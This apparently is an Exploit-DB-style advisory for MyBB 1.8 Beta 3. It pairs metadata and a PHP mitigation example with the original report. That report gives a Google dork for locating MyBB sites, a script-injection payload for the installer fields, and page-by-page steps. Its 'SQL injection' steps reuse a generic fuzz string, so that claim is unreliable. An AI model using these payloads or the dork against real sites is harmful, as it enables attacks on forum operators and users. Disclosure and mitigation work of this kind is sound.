Vendor: MyBB
By: DemoLisH
CVSS: 8,8 (HIGH)
Cross Site Scripting & SQL Injection
CWE: 89
Product Name: MyBB
Affected Version From: 1.8 Beta 3
Affected Version To: 1.8 Beta 3
Patch Exists: YES
Related CWE: N/A
CPE: a:mybb:mybb:1.8_beta3
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2014

MyBB 1.8 Beta 3 – Cross Site Scripting & SQL Injection

Cross Site Scripting can be exploited by filling the Forum Name, Website Name, and Website URL fields with malicious code during the installation wizard. SQL Injection can be exploited by submitting malicious code as the search keywords on the Inbox, Show Thread, Search, Help Documents, and Forum Display pages.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in any SQL queries.
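The mitigation above, as an added example in PHP (the language MyBB is written in); it is not MyBB's code and not part of the original advisory. The schema, function names and sample rows are hypothetical, and it assumes PDO with the SQLite driver. It binds the search keywords instead of concatenating them, validates integer ids such as tid and fid, and encodes a stored setting on output.

```php
<?php
declare(strict_types=1);

// Hypothetical schema standing in for a message table (not MyBB's own).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE messages (id INTEGER PRIMARY KEY, subject TEXT)');
$db->exec("INSERT INTO messages (subject) VALUES ('Welcome'), ('100% done'), ('It''s here')");

// Keyword search: the value is bound as a parameter, never concatenated into the SQL text.
// LIKE wildcards in the keyword are escaped so user input is matched literally.
function search_messages(PDO $db, string $keywords): array
{
    $literal = strtr($keywords, ['\\' => '\\\\', '%' => '\\%', '_' => '\\_']);
    $stmt = $db->prepare("SELECT id, subject FROM messages WHERE subject LIKE :kw ESCAPE '\\'");
    $stmt->execute([':kw' => '%' . $literal . '%']);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Integer ids such as tid/fid: accept a positive integer, reject everything else.
function int_param(array $query, string $name): ?int
{
    $v = filter_var($query[$name] ?? null, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $v === false ? null : $v;
}

// Output side: settings such as the board name are HTML-encoded when rendered.
function render_title(string $boardName): string
{
    return '<title>' . htmlspecialchars($boardName, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . '</title>';
}

// Constructed inputs: the probe string from this page and installer-style values.
$probe = '<foo> <h1> <script> alert (bar) () ; // \' " > < prompt \\x41 %42 constructor onload';
var_dump(count(search_messages($db, $probe)));
var_dump(count(search_messages($db, "'")));
var_dump(int_param(['tid' => "1' OR '1'='1"], 'tid'));
echo render_title('"><script>alert(1)</script>'), PHP_EOL;
```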

Exploit-DB raw data:

# Title: MyBB 1.8 Beta 3 - Cross Site Scripting & SQL Injection
# Google Dork: intext:"Powered By MyBB"
# Date: 15.08.2014
# Author: DemoLisH
# Vendor Homepage: http://www.mybb.com/
# Software Link: http://www.mybb.com/downloads
# Version: 1.8 - Beta 3
# Contact: onur@b3yaz.org
***************************************************
a) Cross Site Scripting in Installation Wizard ( Board Configuration )
Fill -Forum Name, Website Name, Website URL- with your code, for example - "><script>alert('DemoLisH')</script>
localhost/install/index.php
Now let's finish setup and go to the homepage.


b) SQL Injection in Private Messages ( User CP )
Go to -> Inbox, for example: localhost/private.php
Search for the following code in Keywords: <foo> <h1> <script> alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload


c) SQL Injection in Showthread
Go to -> Show Thread, for example: localhost/showthread.php?tid=1
Search for the following code in Keywords: <foo> <h1> <script> alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload


d) SQL Injection in Search
Go to -> Search, for example: localhost/search.php
Search for the following code in Keywords: <foo> <h1> <script> alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload


e) SQL Injection in Help Documents
Go to -> Help Documents, for example: localhost/misc.php?action=help
Search for the following code in Keywords: <foo> <h1> <script> alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload


f) SQL Injection in Forum Display
Go to -> Forum Display, for example: localhost/forumdisplay.php?fid=2
Search for the following code in "Search this Forum": <foo> <h1> <script> alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload

***************************************************
[~#~] Thanks To: Mugair, X-X-X, PoseidonKairos, DexmoD, Micky and all TurkeySecurity Members.